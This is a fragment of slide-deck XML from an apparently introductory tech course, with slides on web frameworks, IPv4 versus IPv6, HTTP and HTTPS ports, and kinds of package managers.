                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Python</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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Django</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47275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Ruby</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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>RubyOnRails</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  (ROR)</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647275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>PHP</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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Laravel</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of IP Address</a:t>
            </a:r>
            <a:endParaRPr sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Google Shape;663;p119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657625" y="2929450"/>
            <a:ext cx="3045900" cy="6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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP V4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Google Shape;664;p119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382025" y="2929450"/>
            <a:ext cx="3045900" cy="6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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP V6</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="665" name="Google Shape;665;p119"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2408675" y="950475"/>
            <a:ext cx="1468200" cy="1951500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="666" name="Google Shape;666;p119"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="662" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1017725"/>
            <a:ext cx="1995300" cy="193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2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4020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types Of TCP </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657625" y="2929450"/>
            <a:ext cx="3045900" cy="6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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HyperText Transfer Protocol</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PORT 80</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Google Shape;673;p120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4515250" y="2929450"/>
            <a:ext cx="4185900" cy="6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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HyperText Transfer Protocol Secure</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PORT 443</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p120"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2408675" y="950475"/>
            <a:ext cx="1468200" cy="1951500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="675" name="Google Shape;675;p120"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1017725"/>
            <a:ext cx="1995300" cy="193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2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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657625" y="3386650"/>
            <a:ext cx="3045900" cy="6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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Google Shape;682;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382025" y="3386650"/>
            <a:ext cx="3045900" cy="69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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Programing </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Language</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="683" name="Google Shape;683;p121"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2408675" y="1026675"/>
            <a:ext cx="1468200" cy="1951500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="684" name="Google Shape;684;p121"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1093925"/>
            <a:ext cx="1995300" cy="193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2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 sz="3420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2978175"/>
            <a:ext cx="4249800" cy="14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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High Level Package Manager</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Google Shape;691;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706750" y="2894175"/>
            <a:ext cx="4249800" cy="14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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Level Package Manager</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="692" name="Google Shape;692;p122"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2408675" y="1026675"/>
            <a:ext cx="1468200" cy="1951500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p122"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1093925"/>
            <a:ext cx="1995300" cy="193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id="698" name="Google Shape;698;p123"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10363" l="15351" r="18163" t="10883"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="914399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4F87A3"/>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